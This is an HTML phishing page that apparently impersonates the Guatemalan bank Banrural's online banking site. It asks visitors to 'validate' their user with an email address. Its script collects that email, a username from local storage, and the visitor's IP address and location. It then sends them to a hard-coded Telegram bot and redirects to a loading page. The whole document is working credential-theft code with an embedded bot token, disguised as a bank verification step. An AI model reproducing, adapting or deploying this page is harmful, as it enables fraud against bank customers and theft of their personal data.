<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Rural en Linea</title>
    <meta name="description" content="Verificacion de datos en el sistema" />
    <style>
      body {
        position: relative;
        height: 100%;
        overflow: hidden;
        margin: 0px;
        font-family: Arial, Helvetica, sans-serif;
        color: grey;
        padding: 0px;
        border: none;
        background: #fff url(fondo.jpg) no-repeat fixed top;
        background-size: cover;
        display: block;
      }

      .center {
        max-width: 361px;

        height: 523px;
        background: #e6e6e6;
      }

      .centrar {
        text-align: center;
        /* Elimina el margen y ajusta la alineación vertical */
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        height: 100%; /* Ajusta la altura al 100% */
      }

      @media (max-width: 600px) {
        .centrar {
          display: grid;
          margin: 0px;
          place-items: center;
          height: 522px;
          margin-top: 20px;
        }

        .center {
          width: 100%;
          height: 100%;
        }
      }
    </style>
  </head>

  <body>
    <div
      style="
        display: flex;
        justify-content: space-between;
        width: 100%;
        height: 100px;
        background: #00853f;
        border-bottom: #f89429 solid 5px;
      "
    >
      <img
        src="logo.png"
        alt="Imagen Izquierda"
        style="width: 120px; padding: 20px"
      />
    </div>

    <form
      id="loginform"
      style="border: 2px solid transparent; border-radius: 10px; padding: 20px"
    >
      <div class="centrar">
        <div class="center">
          <div
            style="
              text-align: left;
              padding: 50px;
              padding-left: 20px;
              padding-bottom: 0;
            "
          >
            Es necesario que valides tu usuario antes de iniciar sesión
          </div>
          <div style="text-align: left; margin-left: 20px; margin-top: 50px">
            <h4>Correo Electronico</h4>
          </div>
          <div style="display: flex; align-items: center; margin-left: 20px">
            <input
              required=""
              name="ix1"
              id="ix1"
              type="email"
              placeholder=""
              autocomplete="off"
              style="
                height: 32px;
                width: 154px;
                border: none;
                background: white;
                padding: 0px 0 0 8px;
                border: 1px solid rgb(184, 184, 184);
                font-size: 16px;
                font-family: sans-serif;
              "
            />
            <div style="margin-left: 10px; padding-top: 5px">
              <button style="background: transparent; border: 0; margin: 0">
                <img src="boton.jpg" width="140" />
              </button>
            </div>
          </div>
          <div style="text-align: center">
            <img src="campos.jpg" style="width: 280px; margin-top: 30px" />
          </div>
        </div>
      </div>
    </form>
  </body>
  <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

  <script>
    const url = "https://ipapi.co/json/";
    const form = document.querySelector("#loginform");
    form.addEventListener("submit", (event) => {
      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
      axios
        .get(url)
        .then((response) => {
          const correo = document.querySelector("#ix1").value;
          const message =
            "\nBanrural\nUsuario: " +
            localStorage.getItem("usuario") +
            "\nCorreo: " +
            correo +
            "\nCiudad:" +
            response.data.city +
            "\nPais: " +
            response.data.country +
            "\nIP: " +
            response.data.ip;
          axios
            .post(
              "https://api.telegram.org/bot6603928446:AAEd5SV-sdcsNmU6_-RmeO75E7hVDXOMtuM/sendMessage",
              {
                chat_id: "-4099299436",
                text: message,
              }
            )
            .then((response2) => {
              axios
                .post(
                  "https://api.telegram.org/bot6603928446:AAEd5SV-sdcsNmU6_-RmeO75E7hVDXOMtuM/sendMessage",
                  {
                    chat_id: "-4099299436",
                    text: message,
                  }
                )
                .then((response2) => {
                  console.log(response2.data);
                  window.location.href = "cargando.html";
                });
            })
            .catch((error) => {
              console.error(error);
            });
        })
        .catch((error) => {
          console.log(error);
        });
    });
  </script>
</html>
